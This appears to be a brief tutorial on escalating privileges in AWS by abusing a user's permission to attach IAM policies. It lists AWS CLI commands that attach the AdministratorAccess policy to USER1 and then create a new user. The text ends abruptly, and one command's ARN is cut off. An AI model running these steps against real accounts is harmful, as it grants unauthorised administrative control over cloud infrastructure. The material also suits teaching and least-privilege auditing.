Most of the attacks targeting AWS are based on exploiting the extensive permissions attached to the roles/accounts. This can be considered as a mis-configuration because the administrator was not following the principle of least privilege while creating roles and permissions.
Assume a scenario, Where there is a user in AWS who has the permission to attach user policy. The same user can elevate the privilege because it has the access to attach policies in to it. The user can even gain administrative privileges by exploiting this mis-configuration.
aws iam get-policy --policy-arn arn:aws:iam::11223344556:policy/Service
Look for the currently using policy version.
aws iam get-policy-version --policy-arn arn:aws:iam::
Since we have the permission to attach policies, lets Search for the ARN of the AdministratorAccess Policy and attach it to the user.
aws iam list-policies | grep 'AdministratorAccess'
aws iam attach-user-policy --user-name USER1 --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
Verify the action by listing the attached policies to the user.
aws iam list-attached-user-policies --user-name USER1
aws iam create-user --user-name USER2